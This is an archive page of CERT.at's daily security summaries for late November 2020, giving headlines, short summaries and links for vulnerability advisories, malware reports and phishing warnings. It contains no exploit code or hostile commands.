https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-ibm-java… ∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Content Classification ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-… ∗∗∗ Security Bulletin: IBM Content Classification is affected by a Eclipse Jetty (Publicly disclosed vulnerability) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-content-classificatio… ∗∗∗ Security Bulletin: A vulnerability in IBM Java Runtime affects IBM CICS TX on Cloud ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-in-ibm-ja… ∗∗∗ Security Bulletin: Eclipse Jetty (Publicly disclosed vulnerability) affects Content Classifaction ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-eclipse-jetty-publicly-di… ∗∗∗ Security Bulletin: A vulnerability in IBM Java Runtime affect IBM CICS TX on Cloud ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-in-ibm-ja… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 27.11.2020
by Daily end-of-shift report 27 Nov '20

27 Nov '20

===================== = End-of-Day report = ===================== Timeframe: Donnerstag 26-11-2020 18:00 − Freitag 27-11-2020 18:00 Handler: Stephan Richter Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Achtung Identitätsdiebstahl: Kriminelle versenden betrügerische E-Mails im Namen der Post! ∗∗∗ --------------------------------------------- Zahlreiche LeserInnen melden uns derzeit eine betrügerische E-Mail, die im Namen der Österreichischen Post verschickt wird. In diesem E-Mail werden Sie dazu aufgefordert, eine Ausweiskopie zu senden, damit eine Lieferung verarbeitet werden kann. Ignorieren Sie diese E-Mail. Es handelt sich um Betrug! --------------------------------------------- https://www.watchlist-internet.at/news/achtung-identitaetsdiebstahl-krimine… ∗∗∗ Sicherheitsupdates: Archive mit Schadcode könnten Drupal-Websites gefährden ∗∗∗ --------------------------------------------- Die Drupal-Enwickler haben zwei gefährliche Sicherheitslücken im Content Management System Drupal geschlossen. --------------------------------------------- https://heise.de/-4972845 ∗∗∗ Mit dem Bloodhound auf Active-Directory-Jagd ∗∗∗ --------------------------------------------- Auf seiner SO-CON zeigte SpecterOps viele Aktualisierungen für Security-Werkzeuge, darunter BloodHound 4.0 für Active-Directory-Angriffe. --------------------------------------------- https://heise.de/-4973049 ∗∗∗ Hackers Love Expired Domains ∗∗∗ --------------------------------------------- Sometimes, website owners no longer want to own a domain name and they allow it to expire without attempting to renew it. This happens all the time and is totally normal, but it’s important to remember that attackers regularly monitor domain expirations and may target certain domains that meet specific criteria. Vendor domains can be an easy backdoor A vendor (supplier) domain is defined as a website that is used to host and load third party Javascript resources [...] --------------------------------------------- https://blog.sucuri.net/2020/11/hackers-love-expired-domains.html ∗∗∗ Digitally Signed Bandook Malware Once Again Targets Multiple Sectors ∗∗∗ --------------------------------------------- A cyberespionage group with suspected ties to the Kazakh and Lebanese governments has unleashed a new wave of attacks against a multitude of industries with a retooled version of a 13-year-old backdoor Trojan. Check Point Research called out hackers affiliated with a group named Dark Caracal in a new report published yesterday for their efforts to deploy "dozens of digitally signed variants" of [...] --------------------------------------------- https://thehackernews.com/2020/11/digitally-signed-bandook-malware-once.html ===================== = Vulnerabilities = ===================== ∗∗∗ Citrix Virtual Apps and Desktops Security Update ∗∗∗ --------------------------------------------- 2020-11-25: Improved clarification on when a version is impacted and added that 1912 LTSR CU2 is now available --------------------------------------------- https://support.citrix.com/article/CTX285059 ∗∗∗ Security updates for Friday ∗∗∗ --------------------------------------------- Security updates have been issued by Arch Linux (go, libxml2, postgresql, and wireshark-cli), Debian (drupal7 and lxml), Fedora (drupal7, java-1.8.0-openjdk-aarch32, libxml2, pacemaker, slurm, and swtpm), openSUSE (c-ares, ceph, chromium, dash, firefox, go1.14, java-1_8_0-openjdk, kernel, krb5, perl-DBI, podman, postgresql10, postgresql12, rclone, slurm, ucode-intel, wireshark, wpa_supplicant, and xen), SUSE (ceph, firefox, kernel, LibVNCServer, and python), and Ubuntu (freerdp, poppler, and [...] --------------------------------------------- https://lwn.net/Articles/838469/ -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 26.11.2020
by Daily end-of-shift report 26 Nov '20

26 Nov '20

===================== = End-of-Day report = ===================== Timeframe: Mittwoch 25-11-2020 18:00 − Donnerstag 26-11-2020 18:00 Handler: Stephan Richter Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Risk Based Authentication: Die Krücke für Passwörter und wie sie ausgenutzt wird ∗∗∗ --------------------------------------------- Mit der Risikoabschätzung RBA wollen Online-Dienste den Passwortmissbrauch bekämpfen. Doch Cybercrime macht daraus ein Geschäft: mit digitalen Doppelgängern. --------------------------------------------- https://heise.de/-4970547 ∗∗∗ Was ist SIM‑Swapping und wie können Sie sich schützen ∗∗∗ --------------------------------------------- Bei diesem Angriff geht es um ihre Telefonnummer und zwar darum sie Ihnen wegzunehmen. --------------------------------------------- https://www.welivesecurity.com/deutsch/2020/11/26/was-ist-sim-swapping-und-… ∗∗∗ Vorsicht! Der Download dieser Apps entpuppt sich als teure Abo-Falle! ∗∗∗ --------------------------------------------- Es gibt viele hilfreiche Apps für das Handy, die das Leben erleichtern können. Allerdings gibt es auch Apps, die das Leben erschweren. So tauchen immer wieder Apps im Google Play- oder im App-Store auf, bei denen ungewollte und teure Abos abgeschlossen werden. Die Kosten werden dabei entweder gar nicht erwähnt oder kaum sichtbar im Kleingedruckten versteckt. Wir zeigen Ihnen, wie Sie sich vor dieser Betrugsmasche schützen können. --------------------------------------------- https://www.watchlist-internet.at/news/vorsicht-der-download-dieser-apps-en… ∗∗∗ 71 Opfer seit September: Forscher warnen vor Ransomware Egregor ∗∗∗ --------------------------------------------- Die Hintermänner sind bisher in 19 Ländern aktiv. Die Mehrheit der Opfer befindet sich jedoch in den USA. Dank ausgeklügelter Codeverschleierung können Sicherheitsforscher den Infektionsweg von Egregor bisher nicht vollständig klären. --------------------------------------------- https://www.zdnet.de/88390072/71-opfer-seit-september-forscher-warnen-vor-r… ∗∗∗ Analysis of Kinsing Malwares Use of Rootkit ∗∗∗ --------------------------------------------- The Kinsing malware has been evolving with capabilities added to increase the difficulty of detection. Trend Micro reports on the use of a rootkit in recent samples to carry out these objectives. --------------------------------------------- https://exchange.xforce.ibmcloud.com/collection/6d8ebd5da62cf61982fce04b20b… ===================== = Vulnerabilities = ===================== ∗∗∗ Drupal core - Critical - Arbitrary PHP code execution - SA-CORE-2020-013 ∗∗∗ --------------------------------------------- The Drupal project uses the PEAR Archive_Tar library. The PEAR Archive_Tar library has released a security update that impacts Drupal. --------------------------------------------- https://www.drupal.org/sa-core-2020-013 ∗∗∗ Synology: Kritische Lücken aus Disk Station Manager und Safe Access beseitigt ∗∗∗ --------------------------------------------- Über Sicherheitslücken könnten Angreifer aus der Ferne Programmcode auf verwundbaren Geräten ausführen. Abgesicherte Versionen stehen teilweise noch aus. --------------------------------------------- https://heise.de/-4971807 ∗∗∗ Forscher entdeckt zufällig Zero-Day-Lücke in Windows 7 und Server 2008 ∗∗∗ --------------------------------------------- Sie erlaubt eine nicht autorisierte Ausweitung von Benutzerrechten. Neuere Windows-Versionen sind nicht betroffen. Der Forscher stößt bei der Arbeit an einem Update für sein Sicherheitstool PrivescCheck auf den Fehler. --------------------------------------------- https://www.zdnet.de/88390077/forscher-entdeckt-zufaellig-zero-day-luecke-i… ∗∗∗ BlackBerry Powered by Android Security Bulletin - November 2020 ∗∗∗ --------------------------------------------- https://support.blackberry.com/kb/articleDetail?language=en_US&articleNumbe… ∗∗∗ BigBlueButton E-mail Validation Bypass ∗∗∗ --------------------------------------------- https://cxsecurity.com/issue/WLB-2020110211 ∗∗∗ BigBlueButton Meeting Access Code Brute Force Vulnerability ∗∗∗ --------------------------------------------- https://cxsecurity.com/issue/WLB-2020110210 ∗∗∗ Security Bulletin: IBM Cloud Pak for Security (CP4S) could reveal sensitive information to authenticated user (CVE-2020-4626) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-cloud-pak-for-securit… ∗∗∗ Security Bulletin: Multiple Vulnerabilities in IBM Java Runtime affect IBM Cognos Command Center ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-… ∗∗∗ Security Bulletin: IBM Cloud Pak for Security (CP4S) uses weaker than expected cryptographic algorithms (CVE-2020-4624) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-cloud-pak-for-securit… ∗∗∗ Security Bulletin: IBM Network Performance Insight is affected by Apache Commons Codec vulnerability ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-network-performance-i… ∗∗∗ Security Bulletin: IBM Cloud Pak for Security (CP4S) vulnerable to session handling issue (CVE-2020-4696) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-cloud-pak-for-securit… ∗∗∗ Security Bulletin: CP4S 1.3.0.1 fails to use HTTPOnly flag (CVE-2020-4625) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-cp4s-1-3-0-1-fails-to-use… ∗∗∗ Security Bulletin: IBM Cloud Pak for Security (CP4S) is potentially vulnerable to CVS injection (CVE-2020-4627) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-cloud-pak-for-securit… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 25.11.2020
by Daily end-of-shift report 25 Nov '20

25 Nov '20

===================== = End-of-Day report = ===================== Timeframe: Dienstag 24-11-2020 18:00 − Mittwoch 25-11-2020 18:00 Handler: Stephan Richter Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Light-Based Attacks Expand in the Digital Home ∗∗∗ --------------------------------------------- The team that hacked Amazon Echo and other smart speakers using a laser pointer continue to investigate why MEMS microphones respond to sound. --------------------------------------------- https://threatpost.com/light-based-attacks-digital-home/161583/ ∗∗∗ [SANS ISC] Live Patching Windows API Calls Using PowerShell ∗∗∗ --------------------------------------------- I published the following diary on isc.sans.edu: “Live Patching Windows API Calls Using PowerShell“: It’s amazing how attackers can be imaginative when it comes to protecting themselves and preventing security controls to do their job. Here is an example of a malicious PowerShell script that patches live a DLL function [...] --------------------------------------------- https://blog.rootshell.be/2020/11/25/sans-isc-live-patching-windows-api-cal… ∗∗∗ IBM: Aktuelle Security-Updates sichern diverse Produkte gegen Angriffe ab ∗∗∗ --------------------------------------------- Schwachstellen von "Low" bis "High" wurden aus Netezza Host Management, aus Resilient, Spectrum Protect (Plus), TNPM Wireline und weiteren Produkten beseitigt. --------------------------------------------- https://heise.de/-4970430 ∗∗∗ Stantinko Proxy Trojan Masquerades as Apache Servers ∗∗∗ --------------------------------------------- A threat group tracked as Stantinko was observed using a new version of a Linux proxy Trojan that poses as Apache servers to remain undetected. --------------------------------------------- https://www.securityweek.com/stantinko-proxy-trojan-masquerades-apache-serv… ∗∗∗ This critical software flaw is now being used to break into networks - so update fast ∗∗∗ --------------------------------------------- A vulnerability in MobileIron mobile device management software is being used by state-backed hackers and organised crime, warns security agency. --------------------------------------------- https://www.zdnet.com/article/this-software-flaw-is-being-used-to-break-int… ===================== = Vulnerabilities = ===================== ∗∗∗ Sicherheitslücken in McAfee Endpoint Security machen Windows angreifbar ∗∗∗ --------------------------------------------- Es gibt wichtige Updates für McAfee Endpoint Security. Unter bestimmten Voraussetzungen könnten Angreifer Schadcode ausführen. --------------------------------------------- https://heise.de/-4970655 ∗∗∗ 2-Factor Authentication Bypass Flaw Reported in cPanel and WHM Software ∗∗∗ --------------------------------------------- cPanel, a provider of popular administrative tools to manage web hosting, has patched a security vulnerability that could have allowed remote attackers with access to valid credentials to bypass two-factor authentication (2FA) protection on an account. The issue, tracked as "SEC-575" and discovered by researchers from Digital Defense, has been remedied by the company in versions 11.92.0.2, [...] --------------------------------------------- https://thehackernews.com/2020/11/2-factor-authentication-bypass-flaw.html ∗∗∗ Cisco DNA Spaces Connector Command Injection Vulnerability ∗∗∗ --------------------------------------------- A vulnerability in the web-based management interface of Cisco DNA Spaces Connector could allow an unauthenticated, remote attacker to execute arbitrary commands on an affected device. The vulnerability is due to insufficient validation of user-supplied input in the web-based management interface. An attacker could exploit this vulnerability by sending crafted HTTP requests to the web-based management interface. A successful exploit could allow the attacker to execute arbitrary [...] --------------------------------------------- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco… ∗∗∗ Cisco Edge Fog Fabric Resource Exposure Vulnerability ∗∗∗ --------------------------------------------- A vulnerability in the REST API of Cisco Edge Fog Fabric could allow an authenticated, remote attacker to access files outside of their authorization sphere on an affected device. The vulnerability is due to incorrect authorization enforcement on an affected system. An attacker could exploit this vulnerability by sending a crafted request to the API. A successful exploit could allow the attacker to overwrite arbitrary files on the affected device. --------------------------------------------- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco… ∗∗∗ VMSA-2020-0023.3 VMware ESXi, Workstation, Fusion and NSX-T updates address multiple security vulnerabilities (CVE-2020-3981, CVE-2020-3982, CVE-2020-3992, CVE-2020-3993, CVE-2020-3994, CVE-2020-3995) ∗∗∗ --------------------------------------------- Updated security advisory to add VMware Cloud Foundation 3.x and 4.x versions in the response matrix of section 3(a). --------------------------------------------- https://www.vmware.com/security/advisories/VMSA-2020-0023.html ∗∗∗ VMSA-2020-0026.1 VMware ESXi, Workstation and Fusion updates address use-after-free and privilege escalation vulnerabilities (CVE-2020-4004, CVE-2020-4005) ∗∗∗ --------------------------------------------- Updated security advisory to add VMware Cloud Foundation 3.x and 4.x versions in the response matrix of sections 3(a) and 3(b). --------------------------------------------- https://www.vmware.com/security/advisories/VMSA-2020-0026.html ∗∗∗ ICS Advisory (ICSA-20-329-02) Fuji Electric V-Server Lite ∗∗∗ --------------------------------------------- Successful exploitation of this vulnerability could allow for remote code execution on the device. --------------------------------------------- https://us-cert.cisa.gov/ics/advisories/icsa-20-329-02 ∗∗∗ ICS Advisory (ICSA-20-329-01) Rockwell Automation FactoryTalk Linx ∗∗∗ --------------------------------------------- Successful exploitation of these vulnerabilities could allow a denial-of-service condition, remote code execution, or leak information that could be used to bypass address space layout randomization (ASLR). --------------------------------------------- https://us-cert.cisa.gov/ics/advisories/icsa-20-329-01 ∗∗∗ MISP: Schwachstelle ermöglicht Umgehen von Sicherheitsvorkehrungen ∗∗∗ --------------------------------------------- https://www.cert-bund.de/advisoryshort/CB-K20-1170 ∗∗∗ Red Hat Virtualization: Mehrere Schwachstellen ∗∗∗ --------------------------------------------- https://www.cert-bund.de/advisoryshort/CB-K20-1169 ∗∗∗ NETGEAR GS108Ev3 vulnerable to cross-site request forgery ∗∗∗ --------------------------------------------- https://jvn.jp/en/jp/JVN27806339/ ∗∗∗ Security Advisory - Command Injection Vulnerability in ManageOne Product ∗∗∗ --------------------------------------------- https://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20201125… ∗∗∗ Security Advisory - Out-of-bounds Read Vulnerability in Some Huawei Smartphones ∗∗∗ --------------------------------------------- https://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20201125… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 24.11.2020
by Daily end-of-shift report 24 Nov '20

24 Nov '20

===================== = End-of-Day report = ===================== Timeframe: Montag 23-11-2020 18:00 − Dienstag 24-11-2020 18:00 Handler: Stephan Richter Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Warten auf Patches: Kritische VMware-Lücke gefährdet Linux- und Windows-Systeme ∗∗∗ --------------------------------------------- Software von VMware ist über eine Zero-Day-Lücke attackierbar. Bislang gibt es nur Workarounds zur Absicherung. --------------------------------------------- https://heise.de/-4969353 ∗∗∗ Betrügerische Trading-Plattformen: Kriminelle werben mit Kommentaren bei YouTube-Videos ∗∗∗ --------------------------------------------- In den Kommentaren zahlreicher beliebter YouTube-Videos – darunter Last Christmas von Wham! – finden sich Tipps, wie man mit Bitcoin-Handel im Internet reich werden kann. Verpackt in einer hochemotionalen Geschichte berichtet ein Nutzer, wie ihm eine Lyra Holt Dean beim Handel unterstützte. Im Kommentar gibt er auch ihre E-Mail-Adresse an. Schreiben Sie keinesfalls an diese Adresse, es handelt sich um Betrug! --------------------------------------------- https://www.watchlist-internet.at/news/betruegerische-trading-plattformen-k… ∗∗∗ Lookalike domains and how to outfox them ∗∗∗ --------------------------------------------- Our approach is more complex than simply registering lookalike domains to the company and enables real-time blocking of attacks that use such domains as soon as they appear. --------------------------------------------- https://securelist.com/lookalike-domains-and-how-to-outfox-them/99539/ ∗∗∗ Blackrota, a heavily obfuscated backdoor written in Go ∗∗∗ --------------------------------------------- Recently, a malicious backdoor program written in the Go language that exploits an unauthorized access vulnerability in the Docker Remote API was caught by the our Anglerfish honeypot. We named it Blackrota, giventhat its C2 domain name is [...] --------------------------------------------- https://blog.netlab.360.com/blackrota-an-obfuscated-backdoor-written-in-go-… ∗∗∗ Hidden SEO Spam Link Injections on WordPress Sites ∗∗∗ --------------------------------------------- Often when a website is injected with SEO spam, the owner is completely unaware of the issue until they begin to receive warnings from search engines or blacklists. This is by design - attackers intentionally try to prevent detection by arranging injected links so they are not visible to average human traffic. One of the techniques attackers use is to “push” the injected SEO spam links off the visible portion of the website. --------------------------------------------- https://blog.sucuri.net/2020/11/hidden-seo-spam-link-injections-on-wordpres… ∗∗∗ MedusaLocker Ransomware Analysis ∗∗∗ --------------------------------------------- The Cybereason Nocturnus Team has published an analysis of the MedusaLocker ransomware. MedusaLocker targets Windows systems and first appeared in 2019. Since then, it has reportedly been involved in many attacks targeting a number of industry sectors, but especially the healthcare sector. --------------------------------------------- https://exchange.xforce.ibmcloud.com/collection/9b5a2bd4954b29920abc8f39f0a… ===================== = Vulnerabilities = ===================== ∗∗∗ Citrix Hypervisor Security Update ∗∗∗ --------------------------------------------- A security issue has been identified that may allow privileged code running in a guest VM to compromise the host. This issue is limited to only those guest VMs where the host administrator has explicitly assigned a PCI passthrough device to the guest VM. --------------------------------------------- https://support.citrix.com/article/CTX286511 ∗∗∗ Xen Security Advisory XSA-355 - stack corruption from XSA-346 change ∗∗∗ --------------------------------------------- A malicious or buggy HVM or PVH guest can cause Xen to crash, resulting in a Denial of Service (DoS) to the entire host. Privilege escalation as well as information leaks cannot be excluded. --------------------------------------------- https://xenbits.xen.org/xsa/advisory-355.html ∗∗∗ Security updates for Tuesday ∗∗∗ --------------------------------------------- Security updates have been issued by Fedora (chromium, microcode_ctl, and seamonkey), Mageia (f2fs-tools, italc, python-cryptography, python-pillow, tcpreplay, and vino), Oracle (thunderbird), Red Hat (bind, kernel, microcode_ctl, net-snmp, and Red Hat Virtualization), Scientific Linux (net-snmp and thunderbird), SUSE (kernel and mariadb), and Ubuntu (atftp, libextractor, pdfresurrect, and pulseaudio). --------------------------------------------- https://lwn.net/Articles/838255/ ∗∗∗ Synology-SA-20:25 Safe Access ∗∗∗ --------------------------------------------- Multiple vulnerabilities allow remote attackers to execute arbitrary code via a susceptible version of Safe Access. --------------------------------------------- https://www.synology.com/en-global/support/security/Synology_SA_20_25 ∗∗∗ Red Hat JBoss Enterprise Application Platform: Schwachstelle ermöglicht SQL-Injection ∗∗∗ --------------------------------------------- https://www.cert-bund.de/advisoryshort/CB-K20-1161 ∗∗∗ OTRS: Mehrere Schwachstellen ermöglichen Offenlegung von Informationen ∗∗∗ --------------------------------------------- https://www.cert-bund.de/advisoryshort/CB-K20-1159 ∗∗∗ Security Bulletin: IBM TNPM Wireline is vulnerable to Apache Commons Codec. ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-tnpm-wireline-is-vuln… ∗∗∗ Security Bulletin: IBM Resilient SOAR is Using Components with Known Vulnerabilities – IBM SDK, Java Technology Edition v8.0.6.11 ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-resilient-soar-is-usi… ∗∗∗ Security Bulletin: IBM API Connect is vulnerable to arbitrary code execution and security bypass in Drupal (CVE-2020-13664, CVE-2020-13665) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-api-connect-is-vulner… ∗∗∗ [20201107] - Core - Write ACL violation in multiple core views ∗∗∗ --------------------------------------------- https://developer.joomla.org:443/security-centre/834-20201107-core-write-ac… ∗∗∗ [20201106] - Core - CSRF in com_privacy emailexport feature ∗∗∗ --------------------------------------------- https://developer.joomla.org:443/security-centre/833-20201106-core-csrf-in-… ∗∗∗ [20201105] - Core - User Enumeration in backend login ∗∗∗ --------------------------------------------- https://developer.joomla.org:443/security-centre/832-20201105-core-user-enu… ∗∗∗ [20201104] - Core - SQL injection in com_users list view ∗∗∗ --------------------------------------------- https://developer.joomla.org:443/security-centre/831-20201104-core-sql-inje… ∗∗∗ [20201103] - Core - Path traversal in mod_random_image ∗∗∗ --------------------------------------------- https://developer.joomla.org:443/security-centre/830-20201103-core-path-tra… ∗∗∗ [20201102] - Core - Disclosure of secrets in Global Configuration page ∗∗∗ --------------------------------------------- https://developer.joomla.org:443/security-centre/829-20201102-core-disclosu… ∗∗∗ [20201101] - Core - com_finder ignores access levels on autosuggest ∗∗∗ --------------------------------------------- https://developer.joomla.org:443/security-centre/828-20201101-core-com-find… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 23.11.2020
by Daily end-of-shift report 23 Nov '20

23 Nov '20

===================== = End-of-Day report = ===================== Timeframe: Freitag 20-11-2020 18:00 − Montag 23-11-2020 18:00 Handler: Stephan Richter Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Jetzt patchen! Exploit-Code bedroht fast 50.000 Fortinet VPNs ∗∗∗ --------------------------------------------- Die Lage um eine ein Jahr alte Lücke in VPN-Systemen von Fortinet spitzt sich zu. Sicherheitspatches sind schon lange verfügbar. --------------------------------------------- https://heise.de/-4968392 ∗∗∗ GitHub fixes high severity security flaw spotted by Google ∗∗∗ --------------------------------------------- Two weeks after Google disclosed a security flaw in GitHub, the Microsoft-owned site has fixed the issue. --------------------------------------------- https://www.zdnet.com/article/github-fixes-high-severity-security-flaw-spot… ∗∗∗ Botnetze suchen massenhaft nach Anmeldedaten in ungesicherten ENV-Dateien ∗∗∗ --------------------------------------------- Die speichern Konfigurationsdaten von Umgebungen wie Docker, Node.js und Symfony. Sicherheitsanbieter finden zuletzt mehr als 1100 aktive Scanner für ENV-Dateien. Hacker erhalten darüber unter Umständen Zugang zu Servern, um Daten zu stehlen und Malware einzuschleusen. --------------------------------------------- https://www.zdnet.de/88389948/botnetze-suchen-massenhaft-nach-anmeldedaten-… ∗∗∗ FBI warns of increasing Ragnar Locker ransomware activity ∗∗∗ --------------------------------------------- The U.S. Federal Bureau of Investigation (FBI) Cyber Division has warned private industry partners of increased Ragnar Locker ransomware activity following a confirmed attack from April 2020. --------------------------------------------- https://www.bleepingcomputer.com/news/security/fbi-warns-of-increasing-ragn… ∗∗∗ LightBot: TrickBot’s new reconnaissance malware for high-value targets ∗∗∗ --------------------------------------------- The notorious TrickBot has gang has released a new lightweight reconnaissance tool used to scope out an infected victims network for high-value targets. --------------------------------------------- https://www.bleepingcomputer.com/news/security/lightbot-trickbot-s-new-reco… ∗∗∗ TrickBot turns 100: Latest malware released with new features ∗∗∗ --------------------------------------------- The TrickBot cybercrime gang has released the hundredth version of the TrickBot malware with additional features to evade detection. --------------------------------------------- https://www.bleepingcomputer.com/news/security/trickbot-turns-100-latest-ma… ∗∗∗ PYSA/Mespinoza Ransomware ∗∗∗ --------------------------------------------- Over the course of 8 hours the PYSA/Mespinoza threat actors used Empire and Koadic as well as RDP to move laterally throughout the environment, grabbing credentials from as many [...] --------------------------------------------- https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/ ===================== = Vulnerabilities = ===================== ∗∗∗ ICS Advisory (ICSA-20-324-05) Mitsubishi Electric MELSEC iQ-R Series ∗∗∗ --------------------------------------------- Successful exploitation of this vulnerability could cause a denial-of-service condition for the affected product. --------------------------------------------- https://us-cert.cisa.gov/ics/advisories/icsa-20-324-05 ∗∗∗ WebKitGTK and WPE WebKit Security Advisory WSA-2020-0008 ∗∗∗ --------------------------------------------- Date Reported: November 23, 2020 Advisory ID: WSA-2020-0008 CVE identifiers: CVE-2020-13584, CVE-2020-9948,CVE-2020-9951, CVE-2020-9952,CVE-2020-9983. Several vulnerabilities were discovered in WebKitGTK and WPE WebKit. --------------------------------------------- https://webkitgtk.org/security/WSA-2020-0008.html ∗∗∗ Multiple Vulnerabilities in ZTE WLAN router MF253V ∗∗∗ --------------------------------------------- https://sec-consult.com/./en/blog/advisories/multiple-vulnerabilities-in-zt… ∗∗∗ HCL Domino: Mehrere Schwachstellen ermöglichen Denial of Service ∗∗∗ --------------------------------------------- https://www.cert-bund.de/advisoryshort/CB-K20-1155 ∗∗∗ Opera Mini für Android: Schwachstelle ermöglicht Darstellen falscher Informationen ∗∗∗ --------------------------------------------- https://www.cert-bund.de/advisoryshort/CB-K20-1152 ∗∗∗ Trend Micro ServerProtect: Schwachstelle ermöglicht Privilegieneskalation ∗∗∗ --------------------------------------------- https://www.cert-bund.de/advisoryshort/CB-K20-1150 ∗∗∗ WordPress Fancy Product Designer For WooCommerce 4.5.1 File Upload ∗∗∗ --------------------------------------------- https://cxsecurity.com/issue/WLB-2020110179 ∗∗∗ [webapps] TP-Link TL-WA855RE V5_200415 - Device Reset Auth Bypass ∗∗∗ --------------------------------------------- https://www.exploit-db.com/exploits/49092 ∗∗∗ Security Bulletin: IBM Spectrum Protect Server allows Triple DES (3DES) ciphers to be used (CVE-2018-1785) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-spectrum-protect-serv… ∗∗∗ Security Bulletin: Improper Authentication of Websocket Endpoint in IBM Spectrum Protect Operations Center ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-improper-authentication-o… ∗∗∗ Security Bulletin: Vulnerabilities in IBM Java Runtime, IBM WebSphere Application Server Liberty, and Apache Commons affect IBM Spectrum Protect Operations Center and IBM Spectrum Protect Client Management Service ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-ibm-ja… ∗∗∗ Security Bulletin: Vulnerabilities in IBM Db2 and IBM Java Runtime affect IBM Spectrum Protect Server ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-ibm-db… ∗∗∗ Security Bulletin: Vulnerabilities in jQuery, Spring, Dom4j, MongoDB, Linux Kernel, Targetcli-fb, Jackson, Node.js, and Apache Commons affect IBM Spectrum Protect Plus ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-jquery… ∗∗∗ Security Bulletin: Static Credential Vulnerability in IBM Spectrum Protect Plus (CVE-2020-4854) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-static-credential-vulnera… ∗∗∗ Security Bulletin: IBM Spectrum Protect Plus allows use of TLS Version 1.1 protocols (CVE-2020-4783) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-spectrum-protect-plus… ∗∗∗ Security Bulletin: Vulnerability in Python affects IBM Spectrum Protect Plus Microsoft Windows File Systems agent (CVE-2020-15801) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-python-a… ∗∗∗ Security Bulletin: Vulnerability in IBM WebSphere Application Server Liberty affects IBM Spectrum Protect Backup-Archive Client web user interface, IBM Spectrum Protect for Space Management, and IBM Spectrum Protect for Virtual Environments ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-ibm-webs… ∗∗∗ Security Bulletin: Vulnerabilities in Apache Commons and Log4j affect IBM Spectrum Protect Backup-Archive Client and IBM Spectrum Protect for Virtual Environments ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-apache… ∗∗∗ Security Bulletin: IBM Java Runtime Vulnerabilities affect the IBM Spectrum Protect Backup-Archive Client, IBM Spectrum Protect for Space Management, and IBM Spectrum Protect for Virtual Environments ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-java-runtime-vulnerab… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 20.11.2020
by Daily end-of-shift report 20 Nov '20

20 Nov '20

